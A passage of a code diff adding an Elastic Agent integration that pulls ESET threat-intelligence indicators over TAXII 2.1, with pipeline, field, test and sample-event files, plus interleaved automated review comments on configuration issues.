+ default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/d1923a526e8f400dbb301259240ee3d5/objects/
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: false
+ show_user: false
+ default: 1m
+ - name: proxy_url
+ type: text
+ title: Proxy URL
+ multi: false
+ required: false
+ show_user: false
+ description: URL to proxy connections in the form of http\[s\]://:@:
+ - name: interval
+ type: text
+ title: Interval
+ description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 1h
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ multi: false
+ required: true
+ show_user: false
+ default: 48h
+ description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s.
+ - name: page_size
+ type: integer
+ multi: false
+ required: false
+ default: "1000"
+ show_user: false
+ title: Page size
+ description: Maximum number of records to pull in one request.
+ - name: ssl
+ type: yaml
+ title: SSL
+ multi: false
+ required: false
+ show_user: false
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - eset-cc
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
diff --git a/packages/ti_eset/data_stream/cc/sample_event.json b/packages/ti_eset/data_stream/cc/sample_event.json
new file mode 100644
index 00000000000..93ec62905b3
--- /dev/null
+++ b/packages/ti_eset/data_stream/cc/sample_event.json
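Review bot: `page_size` is declared `type: integer` but its default is the quoted string `"1000"`; elastic-package's spec validation may reject the mismatch, and `default: 1000` is what the integer type calls for. The `proxy_url` description ends in `http\[s\]://:@:`, which reads as if the user, password, host and port placeholders were lost (possibly only in this rendering) — worth confirming against the source file. `username` and `password`, which the stream template reads, are not declared among these vars, so they are presumably package-level inputs; a one-line comment above `vars:` saying where they come from would help the next reader.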
@@ -0,0 +1,69 @@ +{ + "@timestamp": "2023-10-19T02:00:09.000Z", + "agent": { + "ephemeral_id": "f8b54ae9-959e-4ef4-b706-1bea093aaf7e", + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.1" + }, + "data_stream": { + "dataset": "ti_eset.cc", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9e0f3400-1e85-4042-80cf-3bb8e2ffb404", + "snapshot": false, + "version": "8.12.1" + }, + "eset": { + "id": "indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-21T02:00:09.000Z" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "threat" + ], + "created": "2024-03-27T14:19:06.534Z", + "dataset": "ti_eset.cc", + "ingested": "2024-03-27T14:19:18Z", + "kind": "enrichment", + "original": "{\"created\":\"2023-10-19T02:00:09.000Z\",\"description\":\"C\\u0026C of Win32/Smokeloader.H trojan\",\"id\":\"indicator--34e0eaa0-d35d-4039-b801-8f05d4e16bea\",\"labels\":[\"malicious-activity\"],\"modified\":\"2023-10-19T02:00:09.000Z\",\"name\":\"https://example.com/some/path\",\"pattern\":\"[url:value='https://example.com/some/path']\",\"pattern_type\":\"stix\",\"pattern_version\":\"2.1\",\"spec_version\":\"indicator\",\"type\":\"indicator\",\"valid_from\":\"2023-10-19T02:00:09Z\",\"valid_until\":\"2023-10-21T02:00:09Z\"}", + "type": [ + "indicator" + ] + }, + "input": { + "type": "httpjson" + }, + "tags": [ + "preserve_original_event", + "forwarded", + "eset-cc" + ], + "threat": { + "feed": { + "name": "ESET Botnet C&C stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "C&C of Win32/Smokeloader.H trojan", + "last_seen": "2023-10-19T02:00:09.000Z", + "modified_at": "2023-10-19T02:00:09.000Z", + "name": "https://example.com/some/path", + "provider": "eset", + "type": "url", + "url": { + "original": "https://example.com/some/path" + } + } + } +} \ No newline at end 
of file
diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log
new file mode 100644
index 00000000000..4462fad8177
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log
@@ -0,0 +1,3 @@
+{"id": "indicator--edf8f990-9172-408c-96da-c33f6111fd5d", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host actively distributes high-severity threat in the form of executable code.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["benign"]}
+{"id": "indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host actively distributes high-severity threat in the form of malicious code.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["malicious-activity"]}
+{"id": "indicator--96a62da3-f84e-480c-89ab-8191e69fdbde", "type": "indicator", "spec_version": "indicator", "created": "2023-10-15T02:05:14.000Z", "modified": "2023-10-15T02:05:14.000Z", "name": "example.com", "description": "Host is known source of active fraudulent content.", "pattern": "[domain-name:value='example.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2023-10-15T02:05:14Z", "valid_until": "2023-10-17T02:05:14Z", "labels": ["unwanted-activity"]}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json
new file mode 100644
index 00000000000..cab9495a20d
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/_dev/test/pipeline/test-eset-ndjson.log-expected.json
@@ -0,0 +1,136 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--edf8f990-9172-408c-96da-c33f6111fd5d", + "labels": [ + "benign" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--edf8f990-9172-408c-96da-c33f6111fd5d\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", \"description\": \"Host actively distributes high-severity threat in the form of executable code.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"benign\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "Low", + "description": "Host actively distributes high-severity threat in the form of executable code.", + "last_seen": "2023-10-15T02:05:14.000Z", + "modified_at": "2023-10-15T02:05:14.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e", + "labels": [ + "malicious-activity" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--b86350c9-c69b-4ef7-8994-8b0bb9b74d3e\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", 
\"description\": \"Host actively distributes high-severity threat in the form of malicious code.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"malicious-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "High", + "description": "Host actively distributes high-severity threat in the form of malicious code.", + "last_seen": "2023-10-15T02:05:14.000Z", + "modified_at": "2023-10-15T02:05:14.000Z", + "name": "example.com", + "provider": "eset", + "type": "url", + "url": { + "domain": "example.com", + "original": "example.com" + } + } + } + }, + { + "@timestamp": "2023-10-15T02:05:14.000Z", + "ecs": { + "version": "8.11.0" + }, + "eset": { + "id": "indicator--96a62da3-f84e-480c-89ab-8191e69fdbde", + "labels": [ + "unwanted-activity" + ], + "valid_until": "2023-10-17T02:05:14.000Z" + }, + "event": { + "category": [ + "threat" + ], + "kind": "enrichment", + "original": "{\"id\": \"indicator--96a62da3-f84e-480c-89ab-8191e69fdbde\", \"type\": \"indicator\", \"spec_version\": \"indicator\", \"created\": \"2023-10-15T02:05:14.000Z\", \"modified\": \"2023-10-15T02:05:14.000Z\", \"name\": \"example.com\", \"description\": \"Host is known source of active fraudulent content.\", \"pattern\": \"[domain-name:value='example.com']\", \"pattern_type\": \"stix\", \"pattern_version\": \"2.1\", \"valid_from\": \"2023-10-15T02:05:14Z\", \"valid_until\": \"2023-10-17T02:05:14Z\", \"labels\": [\"unwanted-activity\"]}", + "type": [ + "indicator" + ] + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "feed": { + "name": "ESET Domain stix 2.1" + }, + "indicator": { + "confidence": "Medium", + "description": "Host is known source of active fraudulent content.", + "last_seen": 
"2023-10-15T02:05:14.000Z",
+ "modified_at": "2023-10-15T02:05:14.000Z",
+ "name": "example.com",
+ "provider": "eset",
+ "type": "url",
+ "url": {
+ "domain": "example.com",
+ "original": "example.com"
+ }
+ }
+ }
+ }
+ ]
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml b/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml
new file mode 100644
index 00000000000..69f3d66bf55
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/_dev/test/system/test-httpjson-config.yml
@@ -0,0 +1,13 @@
+input: httpjson
+service: eti
+vars:
+ username: test
+ password: test
+data_stream:
+ vars:
+ preserve_original_event: true
+ url: http://{{Hostname}}:{{Port}}/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/
+ interval: 30s
+ enable_request_tracer: true
+assert:
+ hit_count: 2
diff --git a/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs b/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs
new file mode 100644
index 00000000000..41117cedade
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/agent/stream/httpjson.yml.hbs
@@ -0,0 +1,72 @@
+config_version: "2"
+
+interval: {{interval}}
+request.method: "GET"
+{{#if enable_request_tracer}}
+request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson"
+{{/if}}
+
+auth.basic.user: {{username}}
+auth.basic.password: {{password}}
+
+{{#if url}}
+request.url: {{url}}
+{{/if}}
+{{#if ssl}}
+request.ssl: {{ssl}}
+{{/if}}
+{{#if http_client_timeout}}
+request.timeout: {{http_client_timeout}}
+{{/if}}
+{{#if proxy_url}}
+request.proxy_url: {{proxy_url}}
+{{/if}}
+
+request.transforms:
+ - set:
+ target: header.Content-Type
+ value: application/taxii+json;version=2.1
+ - set:
+ target: header.Accept
+ value: application/taxii+json;version=2.1
+ - set:
+ target: url.params.match[type]
+ value: indicator
+ - set:
+ target: url.params.limit
+ value: {{page_size}}
+ - set:
+ target: url.params.added_after
+ value: '[[ .cursor.timestamp ]]'
+ default: '[[ formatDate (now (parseDuration "-{{initial_interval}}")) "2006-01-02T15:04:05.000Z" ]]'
+
+response.pagination:
+ - set:
+ target: url.params.added_after
+ value: >-
+ [[ if .last_response.body.more ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ end ]]
+ fail_on_template_error: true
+
+response.split:
+ target: body.objects
+
+cursor:
+ timestamp:
+ value: >-
+ [[ if .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]][[ else ]][[.last_response.url.params.Get "added_after"]][[ end ]]
+ ignore_empty_value: true
+
+tags:
+{{#if preserve_original_event}}
+ - preserve_original_event
+{{/if}}
+{{#each tags as |tag|}}
+ - {{tag}}
+{{/each}}
+{{#contains "forwarded" tags}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+{{#if processors}}
+processors:
+{{processors}}
+{{/if}}
diff --git a/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json b/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json
new file mode 100644
index 00000000000..459c9fffc4e
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/elasticsearch/ilm/default_policy.json
@@ -0,0 +1,23 @@
+{
+ "policy": {
+ "phases": {
+ "delete": {
+ "actions": {
+ "delete": {}
+ },
+ "min_age": "7d"
+ },
+ "hot": {
+ "actions": {
+ "rollover": {
+ "max_age": "2d",
+ "max_size": "50gb"
+ },
+ "set_priority": {
+ "priority": 100
+ }
+ }
+ }
+ }
+ }
+}
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml b/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..6a2eb21d2b8
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,152 @@
+---
+description: Pipeline for processing domains collection feed
+processors:
+  - set:
+      field: ecs.version
+      value: '8.11.0'
+  - set:
+      field: event.kind
+      value: enrichment
+  - append:
+      field: event.category
+      value: threat
+      allow_duplicates: false
+  - append:
+      field: event.type
+      value: indicator
+      allow_duplicates: false
+  - set:
+      field: threat.indicator.provider
+      value: eset
+  - rename:
+      field: message
+      target_field: event.original
+      ignore_missing: true
+      if: ctx.event?.original == null
+  - json:
+      field: event.original
+      target_field: eti
+  - drop:
+      if: ctx.eti?.type != 'indicator'
+  - set:
+      field: threat.feed.name
+      value: "ESET Domain stix 2.1"
+  - date:
+      field: eti.created
+      target_field: "@timestamp"
+      formats:
+        - "ISO8601"
+      if: "ctx.eti?.created != null"
+  - date:
+      field: eti.modified
+      target_field: threat.indicator.last_seen
+      formats:
+        - "ISO8601"
+      if: "ctx.eti?.modified != null"
+  - set:
+      field: threat.indicator.modified_at
+      copy_from: threat.indicator.last_seen
+      if: "ctx.threat?.indicator?.last_seen != null"
+  - date:
+      field: eti.valid_until
+      target_field: eset.valid_until
+      formats:
+        - "ISO8601"
+      if: "ctx.eti?.valid_until != null"
+  - rename:
+      field: eti.id
+      target_field: eset.id
+      ignore_missing: true
+  - rename:
+      field: eti.description
+      target_field: threat.indicator.description
+      ignore_missing: true
+  - foreach:
+      field: eti.labels
+      processor:
+        append:
+          field: eset.labels
+          value: "{{_ingest._value}}"
+      ignore_missing: true
+      ignore_failure: true
+      if: ctx.eti?.labels != null
+  - script:
+      lang: painless
+      params:
+        "benign": 'Low'
+        "malicious-activity": 'High'
+        "phishing-activity": 'High'
+        "unwanted-activity": 'Medium'
+      if: ctx.eset?.labels != null
+      source: >
+        for (def label : ctx.eset.labels) {
+          if (params.containsKey(label)) {
+            ctx.threat.indicator.confidence = params.get(label);
+            break;
+          }
+        }
+  - split:
+      field: eti.pattern
+      target_field: eti._patterns
+      separator: ' OR '
+      ignore_missing: true
+  - foreach:
+      field: eti._patterns
+      if: "ctx.eti?._patterns != null"
+      processor:
+        grok:
+          field: _ingest._value
+          patterns:
+            - "^\\[?domain-name:value='%{DATA:threat.indicator.url.original}'\\]?"
+          ignore_failure: true
+  - set:
+      field: threat.indicator.url.domain
+      copy_from: threat.indicator.url.original
+      if: "ctx.threat?.indicator?.url?.original != null"
+  - set:
+      field: threat.indicator.type
+      value: url
+  - set:
+      field: threat.indicator.name
+      copy_from: eti.name
+      if: "ctx.eti?.name != null"
+  - remove:
+      field:
+        - eti
+      ignore_missing: true
+  - remove:
+      field: event.original
+      if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+      ignore_failure: true
+      ignore_missing: true
+  - script:
+      tag: script_to_drop_null_values
+      lang: painless
+      description: Drops null/empty values recursively.
+      source: |-
+        boolean drop(Object o) {
+          if (o == null || o == '') {
+            return true;
+          } else if (o instanceof Map) {
+            ((Map) o).values().removeIf(v -> drop(v));
+            return (((Map) o).size() == 0);
+          } else if (o instanceof List) {
+            ((List) o).removeIf(v -> drop(v));
+            return (((List) o).length == 0);
+          }
+          return false;
+        }
+        drop(ctx);
+  - append:
+      field: event.kind
+      value: pipeline_error
+      allow_duplicates: false
+      if: ctx.error?.message != null
+on_failure:
+  - set:
+      field: error.message
+      value: '{{ _ingest.on_failure_message }}'
+  - set:
+      field: event.kind
+      tag: set_pipeline_error_to_event_kind
+      value: pipeline_error
\ No newline at end of file
diff --git a/packages/ti_eset/data_stream/domains/fields/agent.yml b/packages/ti_eset/data_stream/domains/fields/agent.yml
new file mode 100644
index 00000000000..845b84ed9c0
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/fields/agent.yml
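Review bot: `threat.indicator.type` is set to `url` unconditionally, so an object whose pattern the grok does not match (it only accepts `domain-name:value='…'`, and the grok runs with `ignore_failure: true`) is indexed as a typed indicator with no `threat.indicator.url.*` value at all; guard the set with `if: "ctx.threat?.indicator?.url?.original != null"` so unparsed patterns stay untyped and can be found and fixed. Since the STIX pattern is `domain-name:value`, the ECS `domain-name` type is the more precise value than `url` — the `url.domain` copy already supports domain-based indicator-match rules — though that is a mapping decision for the package owners. The confidence script stops at the first label that has a mapping, so an object carrying both `benign` and `malicious-activity` gets `Low` or `High` depending on feed ordering; if the feed can emit more than one label, taking the highest severity is safer than taking the first.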
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_eset/data_stream/domains/fields/base-fields.yml b/packages/ti_eset/data_stream/domains/fields/base-fields.yml
new file mode 100644
index 00000000000..7c798f4534c
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/fields/base-fields.yml
@@ -0,0 +1,12 @@
+- name: data_stream.type
+  type: constant_keyword
+  description: Data stream type.
+- name: data_stream.dataset
+  type: constant_keyword
+  description: Data stream dataset.
+- name: data_stream.namespace
+  type: constant_keyword
+  description: Data stream namespace.
+- name: '@timestamp'
+  type: date
+  description: Event timestamp.
diff --git a/packages/ti_eset/data_stream/domains/fields/ecs.yml b/packages/ti_eset/data_stream/domains/fields/ecs.yml
new file mode 100644
index 00000000000..f127a34e100
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/fields/ecs.yml
@@ -0,0 +1,38 @@
+- external: ecs
+  name: ecs.version
+- external: ecs
+  name: message
+- external: ecs
+  name: error.message
+- external: ecs
+  name: event.category
+- external: ecs
+  name: event.ingested
+- external: ecs
+  name: event.kind
+- external: ecs
+  name: event.original
+- external: ecs
+  name: event.created
+- external: ecs
+  name: tags
+- external: ecs
+  name: threat.indicator.name
+- external: ecs
+  name: threat.indicator.confidence
+- external: ecs
+  name: threat.indicator.provider
+- external: ecs
+  name: threat.indicator.url.original
+- external: ecs
+  name: threat.indicator.url.domain
+- external: ecs
+  name: threat.indicator.type
+- external: ecs
+  name: threat.indicator.description
+- external: ecs
+  name: threat.indicator.modified_at
+- external: ecs
+  name: threat.indicator.last_seen
+- external: ecs
+  name: threat.feed.name
diff --git a/packages/ti_eset/data_stream/domains/fields/fields.yml b/packages/ti_eset/data_stream/domains/fields/fields.yml
new file mode 100644
index 00000000000..bf7e7383df2
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/fields/fields.yml
@@ -0,0 +1,21 @@
+- name: eset
+  type: group
+  description: >
+    Fields for ESET Threat Intelligence
+
+  fields:
+    - name: id
+      type: keyword
+      description: The UID of the event object.
+    - name: valid_until
+      type: date
+      description: >-
+        Event expiration date.
+    - name: labels
+      type: keyword
+      description: >-
+        Threat labels.
+- name: labels.is_ioc_transform_source
+  type: constant_keyword
+  value: 'true'
+  description: Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators.
diff --git a/packages/ti_eset/data_stream/domains/lifecycle.yml b/packages/ti_eset/data_stream/domains/lifecycle.yml
new file mode 100644
index 00000000000..326b14e00f6
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/lifecycle.yml
@@ -0,0 +1 @@
+data_retention: 7d
diff --git a/packages/ti_eset/data_stream/domains/manifest.yml b/packages/ti_eset/data_stream/domains/manifest.yml
new file mode 100644
index 00000000000..01c11981843
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/manifest.yml
@@ -0,0 +1,95 @@
+title: "Domain"
+type: logs
+ilm_policy: logs-ti_eset.domains-default_policy
+streams:
+  - input: httpjson
+    title: Domain
+    description: Collect data from ETI Domain feed
+    template_path: httpjson.yml.hbs
+    vars:
+      - name: url
+        description: URL with API root and identifier of Domain collection as described by [TAXII v2.1 standard](https://docs.oasis-open.org/cti/taxii/v2.1/os/taxii-v2.1-os.html#_Toc31107514)
+        type: text
+        title: Collection URL
+        multi: false
+        required: true
+        show_user: true
+        default: https://taxii.eset.com/taxii2/643f4eb5-f8b7-46a3-a606-6d61d5ce223a/collections/a34aa0a4f9de419582a883863503f9c4/objects/
+      - name: enable_request_tracer
+        type: bool
+        title: Enable request tracing
+        multi: false
+        required: false
+        show_user: false
+        description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-httpjson.html#_request_tracer_filename) for details.
+      - name: http_client_timeout
+        type: text
+        title: HTTP Client Timeout
+        description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+        multi: false
+        required: false
+        show_user: false
+        default: 1m
+      - name: proxy_url
+        type: text
+        title: Proxy URL
+        multi: false
+        required: false
+        show_user: false
+        description: URL to proxy connections in the form of http\[s\]://:@:
+      - name: interval
+        type: text
+        title: Interval
+        description: Interval at which the logs will be pulled. Supported units for this parameter are h/m/s.
+        multi: false
+        required: true
+        show_user: true
+        default: 1h
+      - name: initial_interval
+        type: text
+        title: Initial Interval
+        multi: false
+        required: true
+        show_user: false
+        default: 48h
+        description: How far back to look for indicators the first time the agent is started. Supported units for this parameter are h/m/s.
+      - name: page_size
+        type: integer
+        multi: false
+        required: false
+        default: "1000"
+        show_user: false
+        title: Page size
+        description: Maximum number of records to pull in one request.
+      - name: ssl
+        type: yaml
+        title: SSL
+        multi: false
+        required: false
+        show_user: false
+      - name: tags
+        type: text
+        title: Tags
+        multi: true
+        required: true
+        show_user: false
+        default:
+          - forwarded
+          - eset-domains
+      - name: preserve_original_event
+        required: true
+        show_user: true
+        title: Preserve original event
+        description: Preserves a raw copy of the original event, added to the field `event.original`
+        type: bool
+        multi: false
+        default: false
+      - name: processors
+        type: yaml
+        title: Processors
+        multi: false
+        required: false
+        show_user: false
+        description: >
+          Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
+
diff --git a/packages/ti_eset/data_stream/domains/sample_event.json b/packages/ti_eset/data_stream/domains/sample_event.json
new file mode 100644
index 00000000000..77c5ae1097a
--- /dev/null
+++ b/packages/ti_eset/data_stream/domains/sample_event.json
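Review bot: `proxy_url` is a plain `text` var whose description invites embedding credentials (the intended form looks like `http[s]://<user>:<password>@<host>:<port>`; the placeholders appear to have been lost from the rendered text), so a proxy password entered here is stored and displayed as an ordinary policy value; if the package-spec version this package targets supports `secret: true` on vars, mark it, otherwise state in the description that credentials placed here are not treated as secrets. The `ssl` var has no description, so users see a bare yaml box; a one-liner such as `description: SSL options for the TAXII connection, see the Filebeat SSL configuration docs. Avoid verification_mode none outside of testing.` tells them what the block accepts and warns against disabling certificate verification on a credentialed feed. The `enable_request_tracer` description already carries the right caveat that the trace file captures the Basic auth header.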
